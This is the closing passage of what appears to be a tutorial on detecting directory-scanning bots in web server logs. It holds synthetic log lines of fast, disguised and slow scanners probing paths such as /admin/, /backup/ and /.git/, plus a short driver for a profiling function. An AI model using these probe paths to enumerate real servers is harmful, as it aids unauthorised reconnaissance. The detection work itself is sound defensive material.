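    f'198.51.100.23 - - [12/Mar/2016:10:15:03 +0000] "GET /uploads/ HTTP/1.1" 404 162 "-" "{DIRBUSTER_UA}"',
    # same tool with the agent string changed: only the 404 burst gives it away
    f'203.0.113.9 - - [12/Mar/2016:10:16:00 +0000] "GET /cgi-bin/ HTTP/1.1" 404 162 "-" "{BROWSER_UA}"',
    f'203.0.113.9 - - [12/Mar/2016:10:16:00 +0000] "GET /wp-admin/ HTTP/1.1" 404 162 "-" "{BROWSER_UA}"',
    f'203.0.113.9 - - [12/Mar/2016:10:16:01 +0000] "GET /dev/ HTTP/1.1" 404 162 "-" "{BROWSER_UA}"',
    f'203.0.113.9 - - [12/Mar/2016:10:16:01 +0000] "GET /tmp/ HTTP/1.1" 404 162 "-" "{BROWSER_UA}"',
    f'203.0.113.9 - - [12/Mar/2016:10:16:02 +0000] "GET /private/ HTTP/1.1" 404 162 "-" "{BROWSER_UA}"',
    f'203.0.113.9 - - [12/Mar/2016:10:16:02 +0000] "GET /secret/ HTTP/1.1" 404 162 "-" "{BROWSER_UA}"',
    # a normal visitor
    f'192.0.2.10 - - [12/Mar/2016:10:18:00 +0000] "GET / HTTP/1.1" 200 5120 "-" "{BROWSER_UA}"',
    f'192.0.2.10 - - [12/Mar/2016:10:18:01 +0000] "GET /css/site.css HTTP/1.1" 200 2048 "-" "{BROWSER_UA}"',
    f'192.0.2.10 - - [12/Mar/2016:10:18:02 +0000] "GET /news/today.html HTTP/1.1" 200 8192 "-" "{BROWSER_UA}"',
    # a slow scanner spreading the same probes over 100 seconds
    f'198.51.100.77 - - [12/Mar/2016:10:20:00 +0000] "GET /admin/ HTTP/1.1" 404 162 "-" "{BROWSER_UA}"',
    f'198.51.100.77 - - [12/Mar/2016:10:20:25 +0000] "GET /backup/ HTTP/1.1" 404 162 "-" "{BROWSER_UA}"',
    f'198.51.100.77 - - [12/Mar/2016:10: 20:50 +0000] "GET /old/ HTTP/1.1" 404 162 "-" "{BROWSER_UA}"'.replace("10: 20", "10:20"),
    f'198.51.100.77 - - [12/Mar/2016:10:21:15 +0000] "GET /config/ HTTP/1.1" 404 162 "-" "{BROWSER_UA}"',
    f'198.51.100.77 - - [12/Mar/2016:10:21:40 +0000] "GET /.git/ HTTP/1.1" 404 162 "-" "{BROWSER_UA}"',
]

if __name__ == "__main__":
    for ip, info in profile_clients(SAMPLE_LOG).items():
        print(ip, info["verdict"], info["probed"])
```

What to do with a "tarpit" verdict is a policy decision the script deliberately leaves to the operator; the "probed" list is the input to the other half of the talk's question, which is whether any of those directories should exist on the box at all.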